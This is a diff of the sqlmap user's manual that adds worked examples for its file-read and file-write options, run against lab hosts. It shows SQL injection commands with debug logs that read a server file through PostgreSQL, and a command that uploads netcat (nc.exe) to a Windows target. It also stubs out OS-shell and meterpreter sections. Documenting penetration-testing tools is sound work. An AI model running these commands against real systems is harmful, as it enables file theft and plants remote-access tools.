sqlmapproject
diff --git a/‎doc/README.html‎
Lines changed: 129 additions & 15 deletions b/‎doc/README.html‎
Lines changed: 129 additions & 15 deletions
diff --git a/‎doc/README.pdf‎
4.88 KB b/‎doc/README.pdf‎
4.88 KB
@@ -8,7 +8,7 @@
 <H1>sqlmap user's manual</H1>
 
 <H2>by 
-<A HREF="mailto:[email protected]">Bernardo Damele A. G.</A></H2>version 0.7 release candidate 1, April 22, 2009
+<A HREF="mailto:[email protected]">Bernardo Damele A. G.</A></H2>version 0.7, July 25, 2009
 <HR>
 <EM>This document is the user's manual to use 
 <A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
@@ -3950,16 +3950,120 @@ <H3>Read a file from the back-end DBMS file system</H3>
 
 <P>Option: <CODE>--read-file</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>It is possible to retrieve the content of files from the underlying file
+system when the back-end database management is system is either MySQL,
+PostgreSQL or Microsoft SQL Server.
+The file specified can be either a text or a binary file, sqlmap will
+handle either cases automatically.</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
+
+<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
+  "C:\example.txt" -v2
+
+[...]
+[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: PostgreSQL
+
+[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)), 
+CHR(32))
+[hh:mm:53] [INFO] retrieved: 8.3.5,
+[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
+[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
+[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
+[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data 
+LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
+CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
+[hh:mm:03] [INFO] retrieved: 1
+[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
+[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:03] [DEBUG] cleaning up the database management system
+[hh:mm:03] [DEBUG] removing support tables
+[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
+[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file 
+is binary, its content will not be retrieved
+[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
+[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
+[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
+[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
+[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM 
+sqlmapfile
+[hh:mm:04] [INFO] retrieved: 1
+[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
+[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
+||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
+[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
+[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
+[hh:mm:22] [DEBUG] cleaning up the database management system
+[hh:mm:22] [DEBUG] removing support tables
+[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
+C:/example.txt file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
+
+[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
+
+$ cat output/192.168.1.121/files/C__example.txt 
+This is a text file
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
 
 <H3>Write a local file on the back-end DBMS file system</H3>
 
 <P>Options: <CODE>--write-file</CODE> and <CODE>--dest-file</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>It is possible to upload a local file to the underlying file system when
+the back-end database management is system is either MySQL, PostgreSQL or
+Microsoft SQL Server.
+The file specified can be either a text or a binary file, sqlmap will
+handle either cases automatically.</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
+
+<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
+  "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
+
+[...]
+[01:12:29] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[01:12:29] [INFO] testing stacked queries support on parameter 'id'
+[01:12:29] [INFO] detecting back-end DBMS version from its banner
+[01:12:29] [INFO] retrieved: 5.0.67
+[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
+[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
+[01:12:36] [INFO] retrieved: C
+[01:12:36] [INFO] the back-end DBMS operating system is Windows
+do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
+written on the back-end DBMS file system? [Y/n] y
+[01:12:52] [INFO] retrieved: 31744
+[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same 
+size as the local file '/home/inquis/software/netcat/nc.exe.packed'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
 
 <H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Operating system access</A>
@@ -3969,40 +4073,50 @@ <H3>Execute an operating system command</H3>
 
 <P>Option: <CODE>--os-cmd</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>TODO</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
 
 
 <H3>Prompt for an interactive operating system shell</H3>
 
 <P>Option: <CODE>--os-shell</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>TODO</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
 
 
 <H3>Prompt for an out-of-band shell, meterpreter or VNC</H3>
 
 <P>Options: <CODE>--os-pwn</CODE>, <CODE>--priv-esc</CODE>, <CODE>--msf-path</CODE> and <CODE>--tmp-path</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>TODO</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
 
 
 <H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
 
 <P>Options: <CODE>--os-smbrelay</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>TODO</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
 
 
 <H3>Stored procedure buffer overflow exploitation</H3>
 
 <P>Options: <CODE>--os-bof</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
 
-<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
+<P>TODO</P>
+
+<P>The techniques implemented are detailed on the white paper
+<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
 
 
 <H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Miscellaneous</A>